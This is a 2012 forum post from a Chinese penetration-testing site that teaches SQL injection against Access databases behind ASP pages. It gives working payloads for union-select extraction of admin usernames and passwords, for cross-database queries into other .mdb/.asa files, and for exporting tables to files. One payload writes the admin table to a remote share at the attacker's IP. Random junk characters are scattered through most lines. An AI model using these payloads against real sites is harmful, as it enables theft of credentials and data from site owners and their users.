中国网络渗透测试联盟

标题: Access高级注入语句 [打印本页]

作者: admin    时间: 2012-9-15 14:20
标题: Access高级注入语句
--------------------------------------------------------------  c) X% _. F5 k% s  x
union查询法
# }% Y& o; F  d# y( D1 ^* c首先要说的就是查询办法,一般的查询办法就是
) b# K, v5 Z5 j8 P& G( p0 x; {7 l* ]$ N# c  c
程序代码( z% o$ _# `* e/ ?/ Y  c/ S
and 1=(select count(*) from admin where left(id,1)='1')( E9 `, l# B& `* Z& {  }

5 M- K) P- C( V7 R4 n* t& G" m这样开始判断了...就算你使用各种各样的工具,也是一个个字的去猜去判断对不对,不对再换一个.这样的坏处显而易见,慢. 特别是在猜测经过32位MD5加密过的段的时候...基本上你可以去泡壶茶再喝一杯.
, i  ^( ^, q% R' J所以这个时候,union select横空出现.别以为只能在PHP里用哦...
+ ]# M- a9 z9 \9 t  }譬如你有一个ACCESS点:, a2 N( @0 A+ R' v, y
程序代码* R- _# z$ P; `
http://bbs.tian6.com/xiaoyang.asp?coder=1
% C! f6 Z. R+ Q0 Z
; g. [! Q7 ~- M知道存在admin表(你当然可以拿个工具先快速猜出表和字段来),& F: n1 M# \6 R# N1 w
然后我们直接来:5 p/ H2 i3 O4 g
程序代码$ ]: p) j5 e* E8 v$ U$ h
http://bbs.tian6.com/xiaoyang.asp?coder=1 union select 1,2,3,4,5,6..... from admin [where coderx=1(如果有限制查询条件)]4 C/ `; l- q2 K7 {' D

4 `9 y9 d" F, v& G4 V9 u* |+ o这里从1开始加到回显正常为止.然后替换URL里相应在页面出现的1~X为password,username之类的东西,就可以直接暴内容了.多方便,多快捷.茶可以先放放,凉一些再来喝了.
  a* {& P: `5 \2 B, A' W
$ B/ Z# F- G2 x9 j7 R" }  E6 o5 V5 D7 J

8 ~& c7 M. p9 M; E% K. C---------------------------------------------------------------! J$ `  D' o6 l( R5 d3 m# A
Access跨库查询3 N4 H1 r' @4 A) ~" t7 e7 }
有时候某个网站服务器上有两个以上系统,你发现其中一个有ACCESS注入点,但是后台没法提权,另外一个系统没有注入点,但是后台却有你需要的功能.那么这个时候,跨库来了.当然,你还可以用来MDB溢出,渗透的过程等等.他的作用往往是意想不到的.
- e+ o; `7 Z' b9 @7 @& P跨库的查询语句:
8 P' v3 r. K0 |* `子查询:; |' V, h% J2 U, X7 x
程序代码
6 o& f2 [7 g" \' B4 U# n7 }and (Select Count(*) from [D:\tianyang\backdoor\xiaoyang.mdb].test)>0
% u# T+ z( d. C7 b: H
% U! \! D3 A6 _union查询:
  Y" A# {' C) ^5 c* [6 ^& _程序代码
0 U! |$ N" [9 W7 Qunion select 1,2,3,4.... from admin in "D:\xioatianyang\okok.asa" where id=1, I3 }" [! Z- V3 t: J/ M
! X$ n+ U: p, @6 i0 b9 _
跨库的作用当然不只这些了,大伙继续发挥吧..这里提供两篇参考过的文章连接:$ F1 t3 U; y9 Y5 q! s+ r& }
程序代码, P$ P4 b6 p/ _, j/ y+ f. A
http://www.4ngel.net/article/46.htm ( c  n( B$ b& t- D9 R
http://hf110.com/Article/hack/rqsl/200502/66.html% L4 l" u7 ]# i/ x& A
( `, B6 T/ x+ h/ z% e3 e
---------------------------------------------------------------# u, \! J7 |+ \% |0 `
Access注入,导出txt,htm,html+ A% M; u( {; m& x# J
子查询语句:
5 \4 l1 b/ Z) o6 U# A, s程序代码
, J; o1 y) s8 [7 GSelect * into [test.txt] in 'd:\web\' 'text;' from admin* y2 ?& j8 G1 ]2 J1 _2 n' a3 |
/ S2 ]' |0 @* N0 ~9 V8 |
这样就把admin表的内容以test类型存进了d:\web里面.% P9 A+ g5 D' ^7 v' }
UNION查询:
+ e) n4 z: ^  ^1 }8 o# m程序代码5 |4 D- Y# K- K8 Z1 `3 ^' a
union select * into [admin.txt] in 'c:\' 'test;' from admin5 X; M  a( C4 N$ l/ i/ Y/ Z5 \( z
( B' k2 [/ ?, [7 h
而且这里也可以保存到本地来:- ~% |; I% E$ g  f$ l
程序代码: k8 Q1 M' j7 V
Select * into [test.txt] in '\\yourip\share' 'text;' from admin8 t- H( k4 E- q! W+ H

1 e* _2 H& P: ^/ h; K# B$ q不过,很多人包括我自己测试,本机数据库来操作是没问题的,但是一旦在注入点上,子查询会回显没有权限,union会回显动作查询不能作为行的来源.可以说还是个难题...原因大概是UNION只适用查询结合,UNION后面不能跟动作.和这个内容相关的,本论坛已有一帖:
2 A2 Q4 F! Z: R* ^) q) d/ H5 E" O  I% a/ ~
程序代码: }" Y6 f- S$ p7 g5 M6 T0 E
http://bbs.tian6.com/viewthread.php?tid=3016&extra=page%3D7
- v/ M( R! `, i* Y/ D( K  p' u- |4 j' s$ y9 i& U* M! I
因为网上有许多和这相关的资料,所以我还是把他引进来了.如果一旦这方法运用成功的话,理论上我们只要知道表名,不需要知道段名,就可以看到该表所有内容了.或者我们可以建.php.tianyang  asp.asp之类的文件或者目录来导进文件~还是会很强大的.! z! S- M( n+ B( z. k- |





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2